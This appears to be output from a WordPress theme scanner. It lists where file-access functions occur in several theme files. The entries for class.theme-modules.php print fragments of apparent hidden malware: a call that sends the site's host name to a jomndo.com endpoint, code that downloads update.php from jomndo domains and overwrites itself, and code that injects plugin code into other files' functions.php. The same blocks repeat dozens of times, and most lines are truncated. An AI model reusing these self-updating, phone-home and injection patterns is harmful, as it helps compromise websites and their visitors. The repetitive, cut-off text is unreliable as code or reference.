file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfopen was found in the file class-ae-languages.php 170: fopen(WP_CONTENT_DIR . '/et-content/index.html', 'w');175: fopen(WP_CONTENT_DIR . '/et-content/' . THEME_NAME . '/index.html', 'w');180: fopen(WP_CONTENT_DIR . '/et-content/' . THEME_NAME . '/lang/index.html', 'wfopen was found in the file class-ae-languages.php 170: fopen(WP_CONTENT_DIR . '/et-content/index.html', 'w');175: fopen(WP_CONTENT_DIR . '/et-content/' . THEME_NAME . '/index.html', 'w');180: fopen(WP_CONTENT_DIR . '/et-content/' . THEME_NAME . '/lang/index.html', 'wfopen was found in the file class-ae-languages.php 170: fopen(WP_CONTENT_DIR . '/et-content/index.html', 'w');175: fopen(WP_CONTENT_DIR . '/et-content/' . THEME_NAME . '/index.html', 'w');180: fopen(WP_CONTENT_DIR . '/et-content/' . THEME_NAME . '/lang/index.html', 'wfile_get_contents was found in the file parsers.php 252: if ( ! xml_parse( $xml, file_get_contents( $file ), true ) ) {fopen was found in the file parsers.php 398: $fp = $this->fopen( $file, 'r' );616: function fopen( $filename, $mode = 'r' ) {619: return fopen( $filename, $mode );fclose was found in the file parsers.php 448: $this->fclose($fp);634: function fclose( $fp ) {637: return fclose( $fp );fopen was found in the file parsers.php 398: $fp = $this->fopen( $file, 'r' );616: function fopen( $filename, $mode = 'r' ) {619: return fopen( $filename, $mode );fopen was found in the file parsers.php 398: $fp = $this->fopen( $file, 'r' );616: function fopen( $filename, $mode = 'r' ) {619: return fopen( $filename, $mode );fclose was found in the file parsers.php 448: $this->fclose($fp);634: function fclose( $fp ) {637: return fclose( $fp );fclose was found in the file parsers.php 448: $this->fclose($fp);634: function fclose( $fp ) {637: return fclose( $fp );file_get_contents was found in the file OAuth.php 272: file_get_contents(self::$POST_INPUT)file_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = 